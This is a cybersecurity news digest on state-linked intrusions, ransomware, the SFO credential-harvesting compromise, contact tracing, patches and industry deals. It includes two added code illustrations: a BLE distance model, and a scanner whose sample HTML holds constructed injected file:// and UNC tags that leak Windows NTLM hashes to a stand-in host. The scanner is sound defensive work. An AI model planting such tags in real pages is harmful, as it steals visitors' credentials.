By the CyberWire staff
Electric Panda targets US government contractors.
Politico reports that the US Defense Counterintelligence and Security Agency (DCSA) has warned government contractors that, since February 1st, thirty-eight cleared contractor facilities have been targeted by the Chinese-government-aligned threat actor "Electric Panda." Politico quotes a bulletin distributed by DCSA as saying the agency "detected nearly 600 'inbound and outbound connections' from 'highly likely Electric Panda cyber threat actors' targeting 38 cleared contractor facilities, including those specializing in health care technology." In addition to healthcare, the threat actor has been targeting contractors focused on "cybersecurity, aerospace, naval, health care, power generation, IT systems, telecommunications, risk analysis, and space systems." Politico cites a contractor source as saying these types of warnings from DCSA are common, but it's rare that they single out a specific threat actor.
Apple and Google are developing a COVID-19 contact-tracing system.
Apple and Google announced in a joint statement last week that they're partnering to build a COVID-19 contact-tracing system into the iOS and Android operating systems. The system will use Bluetooth functionality that will notify mobile device users if they’ve been in proximity to someone who’s been infected with the coronavirus. The companies plan to release APIs next month that will "enable interoperability between Android and iOS devices using apps from public health authorities," and then, "in the coming months, Apple and Google will work to enable a broader Bluetooth-based contact tracing platform by building this functionality into the underlying platforms. This is a more robust solution than an API and would allow more individuals to participate, if they choose to opt in, as well as enable interaction with a broader ecosystem of apps and government health authorities." The system depends upon self-reporting on the part of infected individuals, which means that, for the system to be effective, it would have to attract widespread opt-in as well as inspire a willingness on users’ parts to keep their status up-to-date.
The Verge summarizes the privacy safeguards the system will use, and notes the advantages and drawbacks of using Bluetooth Low Energy (BLE) technology. BLE can estimate distance based on signal strength, but it may not be precise enough to reliably give an idea of how risky an interaction was. The Verge surmises that Apple and Google will be working to hone this technology over the next few weeks.
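The imprecision The Verge describes can be made concrete. The following illustration is added here and is not code from the article or from Apple or Google; it assumes the standard log-distance path-loss model (RSSI falls by 10·n·log10(d) dB from a reference reading at 1 m), and the reference level, noise figure and exponent range are illustrative constants, not anything the platforms are known to use.

```python
"""Why BLE signal strength is only a rough proximity measure.

Added illustration (not from the article or from Apple/Google). It uses
the log-distance path-loss model, an assumption: RSSI = P1m - 10*n*log10(d),
where P1m is the RSSI seen at 1 m and n the path-loss exponent (about 2 in
open space, higher indoors). All constants below are illustrative.
"""
import math


def rssi_to_distance(rssi_dbm, p1m_dbm=-60.0, n=2.0):
    """Invert the model: estimated distance in metres for one RSSI reading."""
    return 10 ** ((p1m_dbm - rssi_dbm) / (10.0 * n))


def distance_bounds(rssi_dbm, noise_db=3.0, p1m_dbm=-60.0, n_range=(2.0, 3.0)):
    """Band of plausible distances once two unknowns are admitted:
    +/- noise_db of measurement noise and an environment-dependent
    path-loss exponent anywhere in n_range."""
    lo = min(rssi_to_distance(rssi_dbm + noise_db, p1m_dbm, n) for n in n_range)
    hi = max(rssi_to_distance(rssi_dbm - noise_db, p1m_dbm, n) for n in n_range)
    return lo, hi


def classify_contact(rssi_dbm, threshold_m=2.0, **kwargs):
    """'close' or 'far' only when the whole plausible band lies on one side
    of the threshold; otherwise the reading cannot settle the question."""
    lo, hi = distance_bounds(rssi_dbm, **kwargs)
    if hi <= threshold_m:
        return "close"
    if lo >= threshold_m:
        return "far"
    return "ambiguous"


if __name__ == "__main__":
    # Constructed readings: a reading that nominally says ~2 m is ambiguous
    # once noise and environment are accounted for.
    for rssi in (-55.0, -66.0, -90.0):
        lo, hi = distance_bounds(rssi)
        print(f"RSSI {rssi:6.1f} dBm -> {lo:5.2f}..{hi:5.2f} m -> {classify_contact(rssi)}")
```

The middle reading (-66 dBm) nominally corresponds to about 2 m, yet its plausible band spans roughly 1.3 to 2.8 m, which is exactly the "how risky was this interaction" question the article says BLE may not answer reliably.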
Examining China's COVID-19 disinformation campaigns.
The Wall Street Journal has an overview of the shape, scope, and probable objectives of the Chinese government’s disinformation campaign concerning the coronavirus pandemic. The efforts’ goals seem to be at least threefold. First, deflect any blame for mishandling the epidemic away from the Chinese government. Second, fix any blame there might be for the emergence of the virus somewhere else (and that somewhere else has usually been the United States). Third, portray China as a good international citizen, a reliable and technologically savvy provider of humanitarian aid. Much of this effort depends on state-run media gaining access to social media audiences through advertising, with subsequent amplification in other social media posts.
Read more in our CyberWire Pro Disinformation Briefing.
SFO websites compromised.
San Francisco International Airport (SFO) disclosed last week that two of its websites, SFOConnect and SFOConstruction, suffered cyberattacks last month in which attackers inserted code designed to steal users' login credentials. Users who may have been affected "include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO."
According to ESET, "The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix.... The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials." ZDNet explains that "NTLM hashes can be cracked to obtain a cleartext version of a user's Windows password."
ESET also noted that the tactics, techniques, and procedures displayed in the attack are consistent with those exhibited by Energetic Bear (also known as "Dragonfly"), a threat actor associated with Russia's GRU.
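A site operator can check served pages for the kind of injected reference ESET describes. The scanner below is an added example, not code from the article, ESET or SFO; it flags elements whose fetched attribute points at a file:// URL with a host or at a UNC path, which Internet Explorer resolves over SMB and so sends the visitor's Windows credentials to that host. The sample HTML and the 203.0.113.7 address are constructed.

```python
"""Flag HTML references that would trigger an outbound SMB authentication.

Added example (not from the article, ESET or SFO). A file:// URL naming a
remote host, or a UNC path \\host\share, placed in an auto-fetched
attribute makes Internet Explorer connect over SMB and present the
visitor's username/NTLM hash. Local file:///C:/... references carry no
host and are not flagged. The usual mitigation is to block outbound
TCP 445 at the perimeter and to scan served pages for such references.
"""
from html.parser import HTMLParser
import re

# Attributes whose value a browser fetches without user interaction.
FETCH_ATTRS = {"src", "href", "data", "background", "action", "poster"}

# file://<host>... (a host must follow the two slashes) or \\<host>\...
SUSPICIOUS = re.compile(r"^(?:file://|\\\\)(?P<host>[^/\\\s]+)", re.IGNORECASE)


class SmbRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []  # (tag, attribute, host, raw value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or name not in FETCH_ATTRS:
                continue
            match = SUSPICIOUS.match(value.strip())
            if match:
                self.hits.append((tag, name, match.group("host"), value))


def find_smb_references(html):
    """Return [(tag, attr, host, value), ...] for every file://host or UNC reference."""
    finder = SmbRefFinder()
    finder.feed(html)
    finder.close()
    return finder.hits


# Constructed page: two injected references plus benign and local-file ones.
SAMPLE_HTML = """<html><body>
<img src="/static/logo.png">
<a href="https://example.org/login">Login</a>
<img src="file://203.0.113.7/share/pixel.png" width="1" height="1">
<link rel="stylesheet" href="\\\\203.0.113.7\\share\\style.css">
<iframe src="file:///C:/Windows/notepad.exe"></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, host, value in find_smb_references(SAMPLE_HTML):
        print(f"<{tag} {attr}> -> SMB host {host}: {value}")
```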
Czech Republic warns of disruptive attacks against healthcare institutions.
The Czech Republic's cybersecurity agency NUKIB warned Thursday that it expects to see an "extensive campaign" of disruptive cyberattacks against the country's healthcare facilities. The campaign is expected to begin within days, and a preparatory spearphishing campaign has been underway for several weeks.
A Czech official told Reuters that the actors behind the campaign are unknown, but they're believed to be a "serious and advanced adversary." While the malware samples highlighted by NUKIB use coronavirus-themed lures, another Czech official told Reuters that the spearphishing campaign "is not spray-and-pray COVID malware stuff."
Meanwhile, the Washington Post reports that hospitals and other healthcare institutions around the world are still subject to ransomware attacks. While a select few ransomware gangs pledged to avoid hitting hospitals for the duration of the pandemic, others are exploiting the heightened urgency of healthcare systems.
Portuguese energy giant hit with ransomware.
Energias de Portugal (EDP), a major European energy provider and the world's fourth-largest producer of wind power, sustained a ransomware attack on Monday that affected its corporate network, BleepingComputer reports. An EDP spokesperson told BleepingComputer that "[t]he power supply service and critical infrastructure, however, have never been compromised and we continue to ensure this operation as normal."
BleepingComputer says the attack involved the RagnarLocker ransomware, and the attackers are apparently demanding a 1,580 bitcoin ransom ($10.9 million or €9.9 million), though the EDP spokesperson said "we have no knowledge of this alleged ransom demand - we have only seen this information disclosed in the media, which we cannot verify." RagnarLocker is a fairly new strain of ransomware and was first observed in December 2019.
The attackers also claim to have exfiltrated more than ten terabytes of EDP's data, which they're threatening to leak if the ransom isn't paid. The crooks have published some of this data as proof, including a KeePass password manager database file which BleepingComputer says "leads to a database export including EDP employees' login names, passwords, accounts, URLs, and notes."
APT41 created FreeBSD malware for Citrix appliances.
Palo Alto Networks's Unit 42 published an analysis of a backdoor used by APT41, a Chinese-government-aligned threat actor whose recent activities were outlined by FireEye late last month. Between January and March 2020, FireEye observed the threat actor targeting Citrix, Cisco, and Zoho network devices used by organizations across a broad range of industries.
Unit 42 examined a backdoor the threat actor deployed on Citrix devices running the open-source Unix-like operating system FreeBSD. The backdoor, which Unit 42 calls "Speculoos," was delivered via CVE-2019-19781, a path-traversal vulnerability found in Citrix's Application Delivery Controllers and Gateways that was disclosed in December 2019. The researchers are certain that Speculoos was tailored to execute on Citrix devices and they believe the malware was created exclusively for this campaign, noting the timing of the Citrix vulnerability's disclosure, along with the rarity of malware designed specifically for FreeBSD.
However, the researchers believe the campaign itself was relatively opportunistic, with the attackers seeing the newly disclosed Citrix vulnerability as a low-hanging fruit that could allow them to "gain footholds in a large number of organizations with minimal effort to expand their attack infrastructure."
Read more in our CyberWire Pro Research Briefing.
Nemty to shut down public RaaS offering.
ZDNet reports that the Nemty ransomware gang has announced it's shuttering its public ransomware-as-a-service offering and going private—that is, restricting its customer base to a few skilled operators who will conduct more targeted and profitable attacks. The gang also shut down the site it uses to publish files stolen from uncooperative victims.
The group said past victims who haven't paid ransoms have a week to pay up if they want to acquire decryptors before Nemty's servers are shut down. BleepingComputer hopes this is simply a last-ditch attempt to compel victims to pay, and that the group will release its master keys upon ceasing operations like other ransomware gangs have done in the past.
Clearview AI's source code exposed.
TechCrunch reports that Clearview AI, a controversial company that offers a facial recognition search engine to its customers, inadvertently exposed the source code of its completed apps for Windows, Mac, Android, and iOS, as well as some pre-release versions of the apps. SpiderSilk, a cybersecurity firm headquartered in Dubai, discovered Clearview's data on a cloud server. The server did have a password, but a misconfiguration allowed anyone to create a new account and log in to the repository.
Clearview's founder told TechCrunch that the "flaw did not expose any personally identifiable information, search history or biometric identifiers," and he accused SpiderSilk of extortion. SpiderSilk's chief security officer Mossab Hussein said he disclosed the flaw to Clearview but turned down a bounty in order to publicly disclose the findings.
One of the cloud buckets did contain 70,000 videos taken from a camera in the lobby of an unknown residential building, which showed people passing through. Ton-That, Clearview's founder, told TechCrunch that these videos were taken with the permission of the building's management and were used only for debugging purposes.
Patch news.
VMware released a patch for a critical vulnerability in the VMware Directory Service (vmdir) that could allow an attacker with access to port 389 "to extract highly sensitive information such as administrative account credentials which could be used to compromise vCenter Server or other services which are dependent upon vmdir for authentication." The flaw, tracked as CVE-2020-3952, received a CVSSv3 score of 10.0.
On Patch Tuesday, Microsoft fixed 113 security flaws, nineteen of which are rated "critical" and three of which are being exploited in the wild. KrebsOnSecurity says two of the exploited bugs are remote code execution vulnerabilities in the Adobe Font Manager library; both can be exploited by tricking a user into opening or previewing a malicious document.
Adobe released patches for ColdFusion, After Effects, and Digital Editions.
Crime and punishment.
The Dutch police arrested a local 19-year-old man who allegedly launched DDoS attacks against two Dutch government websites, knocking them offline for several hours, BleepingComputer reports. The police noted that the two affected websites, which serve as portals for citizens to receive government documents, are particularly crucial during the COVID-19 pandemic. The Central Netherlands Police also worked with "hosters or registrars, international police forces, Europol, Interpol, and the FBI" to shut down fifteen booters (DDoS-for-hire services).
The US Federal Trade Commission reports that it's received 20,334 reports of COVID-19-related fraud since January 1st, totaling $15.6 million in losses. The median amount of money lost is $559.
Courts and torts.
Equifax will pay $18.2 million to Massachusetts and $19.5 million to Indiana over the credit reporting agency's 2017 data breach, CyberScoop reports. Equifax will also pay the city of Chicago $1.5 million, according to Law Street.
Facebook is suing the founder of a company called "LeadCloak" for allegedly selling software to assist scammers in ad-spoofing, Business Insider reports.
Policies, procurements, and agency equities.
The US Departments of State, the Treasury, and Homeland Security, and the FBI issued an advisory offering guidance on North Korea's cyber offensive, warning that Pyongyang's financially motivated operations "pose a significant threat to the integrity and stability of the international financial system." The DPRK's cyber activities include cyber-enabled bank heists, extortion campaigns, and cryptojacking. One of the advisory's more interesting points is that North Korea's hackers take up contracts and are "paid to hack websites and extort targets for third-party clients." Also noteworthy is the revelation that Pyongyang's cyber operators run protection rackets, demanding "payment from victims under the guise of long-term paid consulting arrangements in order to ensure that no such future malicious cyber activity takes place." The US Government is offering up to $5 million for information about North Korea's past or present cyber operations.
The US Supreme Court announced that it will begin holding oral arguments via teleconference starting in May, and it plans to provide a live audio feed of these sessions to news networks. Law360 notes that the Court postponed its March and April sessions due to the COVID-19 pandemic.
Read more in our CyberWire Pro Policy Briefing.
Fortunes of commerce.
Swedish telecommunications company Ericsson has won the contract to provide BT, the UK's largest telecom, with equipment for BT's 5G core, SDxCentral reports. Ericsson's equipment will replace Huawei's kit, which had already been installed in BT's network when the UK ruled that Huawei be banned from contributing to the core. According to the BBC, BT estimates that it will take until 2023 to finish removing Huawei's equipment.
Zoom continues to face privacy issues and has been banned from use by several large companies, including Siemens and Standard Chartered Bank, TechRadar reports. Zoom doesn't appear to be discouraged, however, and has added a number of respected security experts to its advisory team. ZDNet reports that, in addition to Alex Stamos, the company has brought on Luta Security's Katie Moussouris and Johns Hopkins professor Matthew Green. The CyberWire Pro Privacy Briefing has more on this story.
Labor markets.
Crunchbase reports that startups have been hard-hit by the pandemic, with many of them forced to lay off workers. Big Tech, however, is hiring, and they're looking in particular for cybersecurity talent. The Wall Street Journal says that Facebook alone plans to hire 10,000 people during 2020.
Mergers and acquisitions.
Colorado-based SOAR platform provider Swimlane has acquired Washington, DC-headquartered incident response firm Syncurity.
CollabNet VersionOne, XebiaLabs, and Arxan Technologies are merging to form a new company, Digital.ai, backed by TPG Capital.
Investments and exits.
London-based biometric identity verification company Onfido has raised $100 million in a funding round led by TPG Growth, TechCrunch reports.
San Francisco-based bug bounty company Bugcrowd has raised $30 million in a Series D round led by Rally Ventures.
Santa Clara, California-based network traffic analysis company Awake Security has raised $36 million in a Series C round led by Evolution Equity Partners, with participation from Energize Ventures and Liberty Global Ventures, as well as existing investors Bain Capital Ventures and Greylock Partners.
New York City-based passwordless identity management company Beyond Identity publicly launched on Tuesday and raised $30 million in a Series A round led by Koch Disruptive Technologies, LLC and New Enterprise Associates. The company was founded by Jim Clark and Tom Jermoluk and aims to replace passwords with X.509-based certificates.
San Francisco-headquartered cloud security automation startup Bridgecrew has emerged from stealth with $18 million in Series A funding led by Battery Ventures, with participation from NFX, Sorenson Ventures, DNX Ventures, Tectonic Ventures, and Homeward Ventures.
San Francisco-based code-level error monitoring company Airbrake has raised $11 million in a funding round led by Elsewhere Partners.
Santa Barbara, California-based network traffic analysis provider MixMode has secured $4 million in a Series A round led by Entrada Ventures, with participation from Keshif Ventures and Blu Venture Investors, VentureBeat reports.
Lightspeed Venture Partners secured a total of $4.2 billion for three of its funds from undisclosed sources, Crunchbase News reports.
More business news, including executive moves, can be found in the CyberWire Pro Business Briefing.